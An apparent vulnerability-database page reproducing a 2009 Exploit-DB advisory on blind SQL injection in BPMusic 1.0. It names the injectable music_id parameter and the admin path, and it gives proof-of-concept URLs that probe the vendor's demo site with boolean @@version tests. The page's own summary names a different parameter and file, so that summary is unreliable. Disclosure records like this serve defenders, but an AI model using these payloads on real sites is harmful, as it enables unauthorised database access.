BPMusic 1.0 blind SQL Vulnerabilities

vendor:

BPMusic

by:

OoN_Boy

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: BPMusic

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: CVE-2009-4010

CPE: cpe:a:bpowerhouse:bpmusic:1.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

BPMusic 1.0 blind SQL Vulnerabilities

BPMusic 1.0 is vulnerable to Blind SQL Injection. This vulnerability can be exploited by remote attackers to gain access to the database and execute arbitrary queries. The vulnerability is located in the 'id' parameter of the 'index.php' file. Remote attackers can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the back-end database.

Mitigation:

Upgrade to the latest version of BPMusic.

Source

Exploit-DB raw data:

[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPMusic 1.0 blind SQL Vulnerabilities										    |
 | Software 		: BPMusic													    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Demo			: http://bpowerhouse.com/demos/bpmusic										    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: PHP                                                                                                               |
 | Database		: MySQL                                                                                                             |
 | Version		: 1.0                                                                                                               |
 | License		: GNU GPL                                                                                                           |
 | Price		: $28.90                                                                                                            |
 | Description		: is a music directory site script, ready for use web directory of music providing audio files. The site is 	    |
 |			  available for users in four different languages (English , Spanish, Frensh and German). Users may search the 	    |
 |			  directory for desired music files and listen to them. The site contains an advanced administration panel for 	    |
 |			  management of  the sites data,postings approval and much more							    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: cari sendiri yah :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/music.php?music_id=[sql]				 	 			    |
 | Aadmin Page		: http://localhost/[path]/admin/index.php									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://bpowerhouse.com/demos/bpmusic/music.php?music_id=292+and+substring(@@version,1,1)=5 True		    |
 |			  http://bpowerhouse.com/demos/bpmusic/music.php?music_id=292+and+substring(@@version,1,1)=4 False		    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)		    |
 |			  kabur.... untuk sementara waktu.... bye bye.....								    |
[x]========================================================================================================================================[x]